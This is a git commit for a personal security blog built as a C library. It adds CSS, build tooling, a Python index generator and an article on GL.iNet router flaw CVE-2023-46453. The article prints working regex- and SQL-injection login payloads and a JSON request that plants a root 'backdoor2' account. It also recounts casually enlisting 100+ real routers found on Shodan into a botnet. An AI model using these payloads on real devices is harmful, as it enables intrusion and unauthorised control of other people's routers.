refactored code + easier deployment + better look and feel

This commit is contained in:
daniele.linguaglossa 2024-10-09 17:36:23 +02:00
parent 447bf08de1
commit c1d5fd00e2
24 changed files with 1211 additions and 293 deletions

3
.gitignore vendored
View File

@ -1,3 +1,4 @@
.vscode .vscode
dist dist
src/challenge.c src/challenge.c
res/pages/index.md

286
main.css Normal file
View File

@ -0,0 +1,286 @@
/* main.css */
:root {
--main-link-color: #215fc2;
}
html {
margin: 0;
padding: 0;
width: 100%;
height: 100vh;
}
body {
margin: auto;
max-width: 60em;
min-height: 100vh;
font-family: monospace;
font-size: 1.23em;
background-color: #ddd;
display: flex;
flex-direction: column;
}
nav#TOC > ul {
list-style-type: decimal;
}
nav#TOC ul li {
margin-bottom: 1em;
}
#title-block-header,
#TOC {
border: 1px solid #222;
border-radius: 15px;
background-color: #ccc;
color: #000;
margin: 1em;
padding: 1em;
}
footer {
border: 1px solid #222;
border-radius: 15px;
background-color: #ccc;
color: #000;
flex-shrink: 0;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
font-size: 0.9em;
}
div.hearth {
display: flex;
justify-content: center;
align-items: center;
margin-left: 0.2em;
margin-right: 0.2em;
font-size: 1.5em;
padding: 0px;
animation: bounce 1s infinite;
color: #d00000;
}
b.author {
color: #000;
text-transform: uppercase;
}
p.author::before {
text-transform: lowercase;
font-weight: normal;
content: "by ";
}
p.date::before {
text-transform: lowercase;
font-weight: normal;
content: "updated on ";
}
p.date {
text-transform: capitalize;
font-weight: bold;
}
p.author {
text-transform: uppercase;
font-weight: bold;
}
h1.title {
text-align: center;
}
section {
margin: 1em;
flex: 1 0 auto;
}
h1,
h2,
h3,
h4,
h5,
h6 {
font-family: monospace;
clear: both;
}
img {
padding: 2px;
border: 2px dashed #333;
background-color: #fff;
color: #000;
height: 15em;
float: right;
clear: right;
margin-left: 1em;
margin-bottom: 1em;
}
figcaption {
display: none;
}
@keyframes bounce {
from,
to {
transform: scale(1, 1);
}
25% {
transform: scale(0.9, 1.1);
}
50% {
transform: scale(1.1, 0.9);
}
75% {
transform: scale(0.95, 1.05);
}
}
header ~ * {
margin: 1em;
padding: 1em;
}
footer > span {
display: flex;
text-align: center;
justify-content: center;
align-items: center;
}
strong {
font-weight: bold;
color: rgb(130, 12, 12);
}
a > strong {
text-decoration: none;
}
a:hover > strong {
text-decoration: underline;
}
pre {
padding: 1rem;
}
div.sourceCode {
background-color: #ffd;
}
pre,
code {
font-family: "Fira Code", monospace;
background-color: #ffd;
color: #1e1e1e;
overflow: auto;
max-height: 500px;
line-height: 1.6;
}
pre {
margin: 1em 0;
line-height: 1.5;
font-size: 0.9em;
}
pre::-webkit-scrollbar,
code::-webkit-scrollbar,
div.sourceCode::-webkit-scrollbar {
width: 15px;
height: 15px;
background-color: #ffd;
}
pre::-webkit-scrollbar-thumb,
code::-webkit-scrollbar-thumb,
div.sourceCode::-webkit-scrollbar-thumb {
background-color: #dcdcba;
border-radius: 6px;
border: 1px solid #fff;
}
pre::-webkit-scrollbar-track,
code::-webkit-scrollbar-track,
div.sourceCode::-webkit-scrollbar-track {
background-color: #ffd;
}
pre.numberSource {
padding-left: 3.5em;
counter-reset: line-number;
}
pre.numberSource code > span::before {
counter-increment: line-number;
content: counter(line-number);
display: inline-block;
width: 2.5em;
margin-right: 1em;
color: #666;
text-align: right;
}
blockquote img {
clear: none;
height: auto;
max-height: 32em;
max-width: 100%;
float: none;
}
blockquote {
padding: 1em;
color: #111;
clear: both;
padding-top: 0.25em;
padding-bottom: 0.25em;
width: auto;
margin: 0 auto;
display: table;
}
a {
text-decoration: none;
color: var(--main-link-color);
}
a:visited {
color: var(--main-link-color);
}
.modal {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.7);
z-index: 9999;
cursor: zoom-out;
}
.modal img {
min-height: 80vh;
max-height: 80vh;
width: auto;
max-width: 95vw;
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
margin: 0;
}
.zoomable {
max-width: 60vw;
max-height: 45vh;
}

View File

@ -1,3 +1,9 @@
---
title: GLiNet Router Authentication Bypass + RCE
date: 2023-11-08
author: DZONERZY
cve_id: CVE-2023-46453
---
DZONERZY Security Research DZONERZY Security Research
GLiNet: Router Authentication Bypass GLiNet: Router Authentication Bypass

View File

@ -0,0 +1,361 @@
---
title: From zero to botnet
description: GL.iNet going wild (RCE + Botnet)
author: DZONERZY
date: Thursday, October 19, 2023
---
# Boredom, that bad guy
![Picture of GL.iNet](../assets/bored-hacker.jpg)
It all started a few days ago; a friend of mine, Michele, contacted me and said he found a vulnerability in the GL.iNet firmware's latest version. The vulnerability was an RCE (Remote Code Execution) that allowed an attacker to execute arbitrary code on the device.
He then asked me to help him 'cause that was a post-auth RCE, and he didn't know how to bypass the login page. Driven by curiosity, I started to analyze the firmware, and I found it was a mix of harmful practices, poor programming skills, and a lot of fun.
# The firmware, binwalk to the rescue
![Binary walking](../assets/binwalk.jpg)
The first thing I did was to download the firmware to analyze it with binwalk, a tool that allows you to *walk* the content of the binary file and match each byte against a database of known magic bytes.
By looking at the results of binwalk, we have the uImage of the kernel **Linux-5.10.176** then, we have some LZMA, which is the compressed kernel itself, and then we have a SquashFS filesystem, just the typical firmware configuration.
We are interested in the SquashFS filesystem since it contains all the files that will be extracted on the device, thus the logic of the web interface. To extract it, I used the **-e** switch.
```
dzonerzy@DZONERZY-PC:$ binwalk openwrt-ar300m16-4.3.7-0913-1694589994.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------0 0x0 uImage header, header size: 64 bytes, header CRC: 0xE940DF96, created: 2023-04-09 12:27:46, image size: 2597174 bytes, Data Address: 0x80060000, Entry Point: 0x80060000, data CRC: 0x3EBB4A22, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-5.10.176"
64 0x40 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 8723876 bytes
2597238 0x27A176 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 12847666 bytes, 4096 inodes, blocksize: 262144 bytes, created: 2023-04-09 12:27:46
```
# OpenWRT-based IPC ubus
The firmware was based on OpenWRT, as we can deduct from the firmware name, so the way web APIs are handled is a mix of openwrt stuff and GL.iNet custom code, and it works roughly as follows:
1 - We have an RPC daemon that is listening on a Unix socket, which, upon receiving a request, will call ubus to forward the request to the proper handler.
2 - The ubus dispatcher, a client that will forward the request to the correct Lua handler.
3 - Then we have the **/usr/sbin/gl-ngx-session**, the actual Lua handler for the authentication mechanism.
Other handlers exist for different functionalities inside **/usr/lib/oui-httpd/rpc/**, but we are interested in the authentication mechanism, so let's focus on that.
More info about how ubus works can be found [here](https://hackmd.io/@rYMqzC-9Rxy0Isn3zClURg/H1BY98bRw).
# The vulnerability, Lua, for real !??
![A bug cutting wires](../assets/bug-wires.jpg)
Upon a first look at the code, I noticed that the **/usr/sbin/gl-ngx-session** script was just Lua code (no weird C MIPS esoteric code, yay!), so I started to analyze it.
The authentication mechanism works in two steps:
1 - The user sends an RPC request calling the challenge method, which will return a random nonce, the selected user's salt, and the crypt's algorithm to hash the password.
2 - The user will then send the password, which should be the md5 of the concatenation of the user, password, and the nonce.
At first look, that seemed solid, but then I looked at the *get_crypt_info* function used to get the challenge, and that's where things started to get interesting.
```lua
local function get_crypt_info(username)
if not username or username == "" then
return nil
end
for l in io.lines("/etc/shadow") do
local alg, salt = l:match('^' .. username .. ':%$(%d)%$(.+)%$')
if alg then
return tonumber(alg), salt
end
end
return nil
end
```
Does it look weird, eh?? This script loops each line inside **/etc/shadow** and matches it against our username. The RegEx will eventually check the following pattern:
```
username:$algorithm$salt$
```
In my opinion, what is really wrong about that code is that our username is not sanitized, but rather, it's used as part of the RegEX, which means that if we find a way to interrupt the regex without further processing, we can make it return whatever we want to match instead of the actual *alg* and *salt*.
As it turns out later, the Lua regex library is not posix compliant, so there's no way to interrupt the regex or make it fail/stop, nor is look-ahead matching supported 😔.
Luckily, this was one of many places where regex injection was possible. Let's look at how the second step of the authentication works.
```lua
login = {
function(req, msg)
local username, hash = msg.username, msg.hash
clean_gl_token()
...
some boring code here
...
local sid = session_login(username, hash)
if not sid then
login_fail = login_fail + 1
if login_fail == login_fail_max_cnt then
login_fail = 0
login_wait = time_now() + login_fail_wait_time
end
ubus_conn:reply(req, { code = rpc.ERROR_CODE_ACCESS })
return
end
login_fail = 0
utils.update_ngx_session("/tmp/gl_token_" .. sid)
...
still more boring code here
...
end, { username = ubus.STRING, hash = ubus.STRING }
}
local function session_login(username, hash)
if not login_test(username, hash) then
return nil
end
local aclgroup = db.get_acl_by_username(username)
local sid = utils.generate_id(32)
sessions[sid] = {
username = username,
aclgroup = aclgroup,
timeout = time_now() + session_timeout
}
session_cnt = session_cnt + 1
return sid
end
local function login_test(username, hash)
if not username or username == "" then return false end
for l in io.lines("/etc/shadow") do
local pw = l:match('^' .. username .. ':([^:]+)')
if pw then
for nonce in pairs(nonces) do
if utils.md5(table.concat({username, pw, nonce}, ":")) == hash then
nonces[nonce] = nil
nonce_cnt = nonce_cnt - 1
return true
end
end
return false
end
end
return false
end
```
This time, the RegEx injection happens inside the *login_test* function; it tries to match everything from the first colon (the hashed password) until the next one.
Luckily, this time, the regex is not strong enough 'cause the usual lines from **/etc/shadow** look like this:
```
root:$1$j9T2jD$5KGIS/2Ug.47GjW0jHOIB/2XwYUafYPh/X:19447:0:99999:7:::
```
Since we have multiple colons that could catch the regex match group, I made it return a different object rather than the hashed password, and as it turned out, that was possible.
With the following username:
```
root:[^:]+:[^:]+
The regex becomes
root:[^:]+:[^:]+:([^:]+)
```
I was able to shift forward the matching group, thus making it return the uid (which is always 0) instead of the hashed password, which means that we can always win the authentication challenge by sending the following hash:
```
md5(<user>:0:<nonce>) -> root:[^:]+:[^:]+:0:<nonce>
```
Let's recap: to take the nonce, we use the original *root* username, and then on the second request, we craft the modified username, which shifts forward the match, and then we use our pre-computed hash to win the challenge.
Upon sending both requests, we are welcomed by the following response:
```json
{
"id":7,
"jsonrpc":"2.0",
"result":{
"username":"root:[^:]+:[^:]+ ",
"sid":"NsPHdkXtENoaotxVZWLqJorU52O7J0OI"
}
}
```
# Abandon hope all ye who enter here
![Hopeless programmer](../assets/hopeless-programmer.jpg)
Not all that shine is gold, and this is the case... In fact, upon logging in with the provided session ID, I got a bunch of **ACCESS DENIED** errors, and we were taken back to the login page.
I asked myself what was going on, and upon further analysis, I found that small piece of code preventing me from getting the flag, ehmmm ops, I mean root (that looks like a CTF).
```lua
local aclgroup = db.get_acl_by_username(username)
local sid = utils.generate_id(32)
sessions[sid] = {
username = username,
aclgroup = aclgroup,
timeout = time_now() + session_timeout
}
```
The issue was with the *aclgroup*, since that was set to blank instead of some fancy ACL name. That's 'cause we used an invalid username (a mix of regex, luck, and magic) instead of the **root** string.
Upon further research in the firmware, I found the code responsible for processing the ACL... 🥁 ... that's what I found inside **/usr/lib/lua/oui/db.lua**:
```lua
M.get_acl_by_username = function(username)
if username == "root" then return "root" end
local db = sqlite3.open(DB)
local sql = string.format("SELECT acl FROM account WHERE username = '%s'", username)
local aclgroup = ""
for a in db:rows(sql) do
aclgroup = a[1]
end
db:close()
return aclgroup
end
```
Wait what?? The ACL is just a string inside a SQLite database, but what caught my attention was that tiny `%s` inside the query (yep, that's what you think). In fact, the username is not sanitized and used as part of the query, which means we can inject SQL code inside the username and make it return whatever we want.
But wait, that means our username should be both a valid regex and a valid SQL query, and that's not possible or is it?
The trick I used here was abusing a single-character match group to inject the SQL code. In fact, the following regex is valid both for Lua and SQL injection:
```
roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+
```
Here, I remove the **t** character from the **root** string and replace it with a single character match group, which will match everything except our SQL code (note the T for the SELECT statement); clever, uhm!? 😀
This will make the query look as follows:
```sql
SELECT acl FROM account WHERE username = 'roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+'
```
This will return our beloved **root** ACL, and we can finally log in as root!
# Come to the dark side, we have cookies
![Come to the dark side, we have cookies](../assets/dark-side-cookie.jpg)
Yes, we have cookies indeed, but what now? Should I stop here and report the vuln? Maybe, but not that time. I was bored and wanted more fun, so I started looking at GL.iNet documentation, looking for neat API stuff to call and play with.
GL.iNet developers are friendly and provide excellent documentation for their API, which can be found [here](https://dev.gl-inet.com/router-4.x-api/).
I found some interesting API, the **system/add_user**, like the following.
> <img src="/assets/system-add-user.jpg.webp" alt="GL.iNet API" class="zoomable"/><br>
As we can deduct from the API parameters, we can add a new user to the system! This seems a neat feature, so I tested this, and after adding a new user, I tried to log in via SSH but got no luck this time 😔 (we will be back on that later).
So, I returned to the documentation, and something caught my attention again. It was the **rtty/run** API with the following arguments:
```
SID: the token of the session
token: the token used during the authentication with a remote server
host server host
port server port
ssl: whether to enable SSL on the server
```
After some googling, I found that [**rtty**](https://github.com/zhaojh329/rtty) is a public GitHub project created by some Chinese guy. The project readme states the following:
> This project is officially supported by GL.iNet.
Oh, nice, some official tool! rtty is the client which is pre-installed on the devices, and it's used to connect to a remote server that is running the [**rttys**](https://github.com/zhaojh329/rttys) server, which is a remote terminal server.
Armed with this knowledge, I connected to my VPS and installed the rttys server with the command:
```
sudo docker run -it -p 5912:5912 -p 5913:5913 zhaojh329/rttys:latest
```
This docker will listen on ports like **5912** and **5913**, respectively, for registration and web interface.
With a bit of Python-fu 🐍 I automated the whole process of searching vulnerable devices on Shodan, exploiting them, adding a backdoor user, and making them connect to my rttys server.
The result was a stunning botnet of 100+ devices (actually, there are even more vulnerable devices on Shodan, but I stopped at 100).
> <img src="/assets/botnet.gif.webp" alt="GL.iNet botnet" class="zoomable"/><br>
Now, I can command all the devices to do whatever we want with the backdoor account we create. I forgot to mention that rttys allow us to execute scheduled commands, so we can even make them execute commands at a specific time, like an actual botnet.
# Bonus chapter, above and beyond
![Above and beyond](../assets/got-root.jpg)
So far, we have exploited the vulnerability and created a botnet, but we didn't manage to create a root account. In fact, the **system/add_user** API makes a regular user rather than a root one.
To create a root account, we need to exploit another vulnerability. **system/add_user** works by appending a new line to **/etc/passwd** and **/etc/shadow** files, obviously without sanitizing the username.
```json
{
"jsonrpc":"2.0",
"method":"call",
"params":[
"<SESSION_ID>",
"system",
"add_user",
{
"username":"backdoor2:$1$uzy0XSBy$K4D7tPeEK0Ea.xQ49V7sO1:0:0:root:/root:/bin/ash\n",
"password": "fake",
"uid": 1337,
"gid": 1337,
"home": "/home/your_router",
"interpreter": "/bin/sh"
}
],
"id":1
}
```
We can abuse that behavior to inject a new line inside **/etc/passwd** and make it look like this:
```
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
stubby:x:410:410:stubby:/var/run/stubby:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
mosquitto:x:200:200:mosquitto:/var/run/mosquitto:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
backdoor2:$1$uzy0XSBy$K4D7tPeEK0Ea.xQ49V7sO1:0:0:root:/root:/bin/ash
:x:1005:1005:backdoor2:$1$uzy0XSBy$K4D7tPeEK0Ea.xQ49V7sO1:0:0:root:/root:/bin/ash
:/home/user:/bin/sh
```
Even if the line is malformed, the system will still parse it, and we will have a new root account named **backdoor2** with the password **test**.
# And the router went wild
![Router going wild](../assets/router-going-wild.jpg)
This was a really fun vuln to exploit. I hope you enjoyed it as much as I did. I reported the vuln to GL.iNet, and they fixed it in the latest firmware version, so if you have a GL.iNet device, please update it.
> Have fun and happy hacking!

View File

Before

Width:  |  Height:  |  Size: 160 KiB

After

Width:  |  Height:  |  Size: 160 KiB

View File

Before

Width:  |  Height:  |  Size: 168 KiB

After

Width:  |  Height:  |  Size: 168 KiB

View File

Before

Width:  |  Height:  |  Size: 302 KiB

After

Width:  |  Height:  |  Size: 302 KiB

View File

Before

Width:  |  Height:  |  Size: 238 KiB

After

Width:  |  Height:  |  Size: 238 KiB

View File

Before

Width:  |  Height:  |  Size: 134 KiB

After

Width:  |  Height:  |  Size: 134 KiB

View File

Before

Width:  |  Height:  |  Size: 16 KiB

After

Width:  |  Height:  |  Size: 16 KiB

View File

Before

Width:  |  Height:  |  Size: 140 KiB

After

Width:  |  Height:  |  Size: 140 KiB

View File

Before

Width:  |  Height:  |  Size: 150 KiB

After

Width:  |  Height:  |  Size: 150 KiB

View File

Before

Width:  |  Height:  |  Size: 242 KiB

After

Width:  |  Height:  |  Size: 242 KiB

View File

Before

Width:  |  Height:  |  Size: 61 KiB

After

Width:  |  Height:  |  Size: 61 KiB

View File

Before

Width:  |  Height:  |  Size: 81 KiB

After

Width:  |  Height:  |  Size: 81 KiB

0
res/pages/.gitkeep Normal file
View File

0
res/projects/.gitkeep Normal file
View File

View File

@ -0,0 +1,3 @@
title: libdzonerzy.so
description: libdzonerzy.so is a shared object that I wrote in C, it's the library that I use to power this blog.
link: https://git.libdzonerzy.so/dzonerzy/libdzonerzy.so

View File

@ -19,6 +19,7 @@ CONVERT_ARGS = -define webp
DIST = dist DIST = dist
SRC_DIR = src SRC_DIR = src
RES_DIR = res
RAW_DIST = dist/raw RAW_DIST = dist/raw
SITE_DIST = dist/site SITE_DIST = dist/site
@ -27,15 +28,22 @@ AWK_UTIL_NOCRLF = awk '/^\s*\[[0-9]+\]\s+([^\.].+)/ {printf $$2" "}'
PANDOC_ARGS = --standalone --table-of-contents --section-divs --email-obfuscation=references --css="/main.css" --include-after-body=$(RAW_DIST)/footer.html --include-after-body=$(RAW_DIST)/scripts.html PANDOC_ARGS = --standalone --table-of-contents --section-divs --email-obfuscation=references --css="/main.css" --include-after-body=$(RAW_DIST)/footer.html --include-after-body=$(RAW_DIST)/scripts.html
PYTHON = $(shell which python3)
libdzonerzy: libdzonerzy:
# first create the index.md page
$(PYTHON) tools/index_gen/indexgen.py --resources $(RES_DIR) --blog-title="DZONERZY's Blog" --blog-author="DZONERZY"
@echo "/* DO NOT EDIT THIS FILE - it is machine generated */" > $(SRC_DIR)/res.h @echo "/* DO NOT EDIT THIS FILE - it is machine generated */" > $(SRC_DIR)/res.h
@mkdir -p $(DIST) @mkdir -p $(DIST)
@mkdir -p $(RAW_DIST) @mkdir -p $(RAW_DIST)
@mkdir -p $(SITE_DIST) @mkdir -p $(SITE_DIST)
@$(foreach file, $(wildcard res/*.jpg res/*.gif res/*.png), $(CONVERT_TOOL) $(file) $(CONVERT_ARGS) $(file).webp;) @$(foreach file, $(wildcard $(RES_DIR)/assets/*.jpg $(RES_DIR)/assets/*.gif $(RES_DIR)/assets/*.png), $(CONVERT_TOOL) $(file) $(CONVERT_ARGS) $(file).webp;)
@$(foreach file, $(wildcard res/*.jpg res/*.gif res/*.png), $(EMBED_TOOL) -i $(file).webp -o $(SRC_INC_DIR)/$(notdir $(file).webp).h $(EMBED_ARGS);) @$(foreach file, $(wildcard $(RES_DIR)/assets/*.jpg $(RES_DIR)/assets/*.gif $(RES_DIR)/assets/*.png), $(EMBED_TOOL) -i $(file).webp -o $(SRC_INC_DIR)/$(notdir $(file).webp).h $(EMBED_ARGS);)
@$(foreach file, $(wildcard res/advisory/*.txt), $(EMBED_TOOL) -i $(file) -t=advisory -o $(SRC_INC_DIR)/$(notdir $(file)).h $(EMBED_ARGS);) @$(foreach file, $(wildcard res/advisory/*.txt), $(EMBED_TOOL) -i $(file) -t=a -o $(SRC_INC_DIR)/$(notdir $(file)).h $(EMBED_ARGS);)
@rm -f res/*.webp @$(foreach file, $(wildcard res/pages/*.md), $(EMBED_TOOL) -i $(file) -t=p -o $(SRC_INC_DIR)/$(notdir $(file)).h $(EMBED_ARGS);)
@$(foreach file, $(wildcard res/articles/*.md), $(EMBED_TOOL) -i $(file) -t=A -o $(SRC_INC_DIR)/$(notdir $(file)).h $(EMBED_ARGS);)
@rm -f res/assets/*.webp
@ls $(SRC_INC_DIR)/*.h | xargs -n1 basename | sed 's/^/#include </' | sed 's/$$/>/' >> $(SRC_DIR)/res.h @ls $(SRC_INC_DIR)/*.h | xargs -n1 basename | sed 's/^/#include </' | sed 's/$$/>/' >> $(SRC_DIR)/res.h
$(CC) $(CFLAGS) $(LDFLAGS) -o $(DIST)/$(OUTPUT) $(SRC_DIR)/libdzonerzy.so.c $(SRC_DIR)/challenge.o $(CC) $(CFLAGS) $(LDFLAGS) -o $(DIST)/$(OUTPUT) $(SRC_DIR)/libdzonerzy.so.c $(SRC_DIR)/challenge.o

File diff suppressed because one or more lines are too long

View File

@ -32,6 +32,8 @@ Copyright:
#define SECTION(x) __attribute__((section(x))) #define SECTION(x) __attribute__((section(x)))
// section name should be like "articles/article_name.md" // section name should be like "articles/article_name.md"
#define ARTICLE(x) SECTION("articles/" x ".md") #define ARTICLE(x) SECTION("articles/" x ".md")
// section name should be like "pages/page_name.md"
#define PAGE(x) SECTION("pages/" x ".md")
/* CSS macros */ /* CSS macros */
// comment macros // comment macros

View File

@ -34,6 +34,8 @@ typedef enum _type
{ {
TYPE_EMBED, TYPE_EMBED,
TYPE_ADVISORY, TYPE_ADVISORY,
TYPE_ARTICLE,
TYPE_PAGE,
} type_t; } type_t;
typedef struct _embed typedef struct _embed
@ -112,6 +114,12 @@ int main(int argc, char **argv)
case 'a': case 'a':
args.type = TYPE_ADVISORY; args.type = TYPE_ADVISORY;
break; break;
case 'p':
args.type = TYPE_PAGE;
break;
case 'A':
args.type = TYPE_ARTICLE;
break;
default: default:
fprintf(stderr, "Unknown type: %s defaulting to embed\n", optarg); fprintf(stderr, "Unknown type: %s defaulting to embed\n", optarg);
args.type = TYPE_EMBED; args.type = TYPE_EMBED;
@ -158,7 +166,7 @@ void usage(char **argv)
printf(" -i, --input=FILE Input file\n"); printf(" -i, --input=FILE Input file\n");
printf(" -o, --output=FILE Output file\n"); printf(" -o, --output=FILE Output file\n");
printf(" -f, --format=FORMAT Output format (c, h)\n"); printf(" -f, --format=FORMAT Output format (c, h)\n");
printf(" -t, --type=TYPE Output type (embed, advisory)\n"); printf(" -t, --type=TYPE Output type (e,a,p,A - embed, advisory, page, article)\n");
printf(" -w, --autowrap Autowrap output\n"); printf(" -w, --autowrap Autowrap output\n");
printf(" -V, --verbose Verbose output\n"); printf(" -V, --verbose Verbose output\n");
printf(" -q, --quiet Quiet output\n"); printf(" -q, --quiet Quiet output\n");
@ -239,6 +247,104 @@ char *clean_filename(char *filename)
return filename; return filename;
} }
unsigned char *read_file_data(FILE *f, size_t *size)
{
fseek(f, 0, SEEK_END);
*size = ftell(f);
fseek(f, 0, SEEK_SET);
unsigned char *data = malloc(*size);
if (data == NULL)
{
return NULL;
}
fread(data, 1, *size, f);
return data;
}
unsigned char *image_add_extension(unsigned char *buff, const char *add_ext)
{
if (buff == NULL || add_ext == NULL)
{
return NULL;
}
// Find the size of the buffer
size_t len = strlen((char *)buff);
// Allocate a new buffer for the modified content
unsigned char *new_buff = malloc(len * 2); // Allocate double the size for safety
if (new_buff == NULL)
{
return NULL;
}
unsigned char *src = buff;
unsigned char *dst = new_buff;
// Loop through the buffer to find markdown image patterns
while (*src)
{
if (strncmp((char *)src, "![", 2) == 0)
{
// Copy the "!["
*dst++ = *src++;
*dst++ = *src++;
// Skip everything inside the square brackets until the closing bracket ']'
while (*src && *src != ']')
{
*dst++ = *src++;
}
// Copy the closing bracket if it's there
if (*src == ']')
{
*dst++ = *src++;
}
// Now check for the '(' indicating the start of the image URL
if (*src == '(')
{
*dst++ = *src++;
unsigned char *start = src;
// Find the end of the image URL which is marked by ')'
while (*src && *src != ')')
{
src++;
}
// Copy the image URL
strncpy((char *)dst, (char *)start, src - start);
dst += src - start;
// Add the extension
strcpy((char *)dst, add_ext);
dst += strlen(add_ext);
// Copy the closing parenthesis
if (*src == ')')
{
*dst++ = *src++;
}
}
}
else
{
// Copy any other character
*dst++ = *src++;
}
}
// Null-terminate the new buffer
*dst = '\0';
return new_buff;
}
int embed(embed_t *args) int embed(embed_t *args)
{ {
if (args->input == NULL) if (args->input == NULL)
@ -316,6 +422,12 @@ int embed(embed_t *args)
case TYPE_ADVISORY: case TYPE_ADVISORY:
typ = "advisory"; typ = "advisory";
break; break;
case TYPE_PAGE:
typ = "pages";
break;
case TYPE_ARTICLE:
typ = "articles";
break;
default: default:
typ = "unknown"; typ = "unknown";
break; break;
@ -342,29 +454,39 @@ int embed(embed_t *args)
} }
} }
int c = 0; size_t i = 0;
int i = 0;
size_t size = 0;
unsigned char *data = read_file_data(input, &size);
// update the image URL with the extension
if (args->type == TYPE_ARTICLE || args->type == TYPE_PAGE)
{
unsigned char *data_updated = image_add_extension(data, ".webp");
// free the original data
free(data);
size = strlen((const char *)data_updated);
data = data_updated;
}
if (args->autowrap) if (args->autowrap)
{ {
while ((c = fgetc(input)) != EOF) while (i < size)
{ {
if (i == 0) if (i == 0)
{ {
fprintf(output, " "); fprintf(output, " ");
} }
fprintf(output, "0x%02X", c); fprintf(output, "0x%02X", data[i]);
fprintf(output, ", "); if (i % 16 == 15)
if (i < 15)
{ {
fprintf(output, ", "); fprintf(output, ",\n");
fprintf(output, " ");
} }
else else
{ {
fprintf(output, ",\n"); fprintf(output, ", ");
i = -1;
} }
i++; i++;
@ -382,14 +504,23 @@ int embed(embed_t *args)
} }
else else
{ {
while ((c = fgetc(input)) != EOF) while (i < size)
{ {
fprintf(output, "0x%02X", c); // no wrap
fprintf(output, ", "); if (i == 0)
{
fprintf(output, "0x%02X", data[i]);
}
else
{
fprintf(output, ", 0x%02X", data[i]);
}
i++;
} }
if (args->type == TYPE_EMBED) if (args->type == TYPE_EMBED)
fprintf(output, "0x00"); fprintf(output, ", 0x00");
fprintf(output, "};\n\n"); fprintf(output, "};\n\n");
} }

66
tools/index_gen/index.md Normal file
View File

@ -0,0 +1,66 @@
---
title: {{ blog.title}}
author: {{ blog.author}}
date: {{ blog.update_date}}
---
# About
![Picture of DZONERZY](../assets/dzonerzy.jpg){class="zoomable"}
Hello world here is dzonerzy, also known as Daniele Linguaglossa, I'm an offensive security researcher and developer.
I'm the author of this blog, and I'm using it to share my researches and my projects.
I'm also the author of the library that powers this blog, yes you heard right, this blog is powered by a **shared object** that I wrote in C!
You can find the source code of this blog in my [git repository](https://git.libdzonerzy.so/dzonerzy/libdzonerzy.so).
# Projects
Here is a list of the projects that I made in my spare time, some of them are still in development, but I'm looking forward to finish them all.
{%for project in projects%}
- **[{{ project.title }}]({{ project.link }})**
-- {{ project.description }}
{%endfor%}
# Articles
Below you can find a list of my articles, I'm writing about offensive security and programming, and also about my projects.
{%for article in articles%}
- **[{{ article.title }}]({{ article.link }})**
-- {{ article.description }}
{%endfor%}
# Advisories
Below you can find a list of my CVEs.
{%for advisory in advisories%}
- **[{{ advisory.cve_id }}]({{ advisory.link }})**
-- {{ advisory.title }}
{%endfor%}
# FAQ
Here is a list of frequently asked questions, if you have any other question feel free to contact me at **dzonerzy[at]gmail.com**.
####
- **Q:** Why this blog is so ugly?
**A:** Because I'm not a web designer, I'm a developer, and I'm not good at designing things, but I'm working on it, I promise.
- **Q:** Why this blog is so fast?
**A:** Actually this is a static website, so it's very fast.
- **Q:** What do you do for living?
**A:** I'm currently working at [RevEng.AI](https://reveng.ai/), where reversing meets artificial intelligence.
- **Q:** Is RevEng.AI hiring?
**A:** Yes, we are always looking for new talents, if you are interested in working with me, feel free to send your resume at ... try to find it, after all it's still "inside" the shared object.

View File

@ -0,0 +1,95 @@
# IndexGen is the index generator for the static website.
# DO NOT MODIFY THIS FILE!
import argparse
import datetime
import jinja2
import glob
import yaml
import sys
import os
def directory_exists(directory) -> bool:
return os.path.exists(directory)
def find_articles(resources) -> list:
articles = []
articles_dir = os.path.join(resources, 'articles')
if not directory_exists(articles_dir):
print('The articles directory does not exist.')
os._exit(1)
for article in glob.glob(os.path.join(articles_dir, '*.md')):
if os.path.exists(article):
with open(article, 'r') as file:
print(article)
article_data = yaml.load_all(file, Loader=yaml.SafeLoader)
# get only first element out of the generator
article_data = next(article_data)
# append link to the article
article_data['link'] = f"/articles/{os.path.basename(article).replace('.md', '.html')}"
articles.append(article_data)
return articles
def find_advisories(resources) -> list:
advisories = []
advisories_dir = os.path.join(resources, 'advisory')
if not directory_exists(advisories_dir):
print('The advisories directory does not exist.')
os._exit(1)
for advisory in glob.glob(os.path.join(advisories_dir, '*.txt')):
if os.path.exists(advisory):
with open(advisory, 'r') as file:
advisory_data = yaml.load_all(file, Loader=yaml.SafeLoader)
# get only first element out of the generator
advisory_data = next(advisory_data)
# append link to the advisory
advisory_data['link'] = f"/advisories/{os.path.basename(advisory)}"
advisories.append(advisory_data)
return advisories
def find_projects(resources) -> list:
projects = []
projects_dir = os.path.join(resources, 'projects')
if not directory_exists(projects_dir):
print('The projects directory does not exist.')
os._exit(1)
for project in glob.glob(os.path.join(projects_dir, '*.yaml')):
if os.path.exists(project):
with open(project, 'r') as file:
project_data = yaml.load_all(file, Loader=yaml.SafeLoader)
# get only first element out of the generator
project_data = next(project_data)
projects.append(project_data)
return projects
def main(args):
parser = argparse.ArgumentParser(description='Generate index.md file for the static website.')
parser.add_argument('--resources', type=str, help='Path to the resources directory.', required=True)
parser.add_argument("--blog-title", type=str, help="Title of the blog", required=True)
parser.add_argument("--blog-author", type=str, help="Author of the blog", required=True)
args = parser.parse_args(args)
# check if the resources directory exists
resources = args.resources
if not directory_exists(resources):
print('The resources directory does not exist.')
os._exit(1)
articles = find_articles(resources)
advisories = find_advisories(resources)
projects = find_projects(resources)
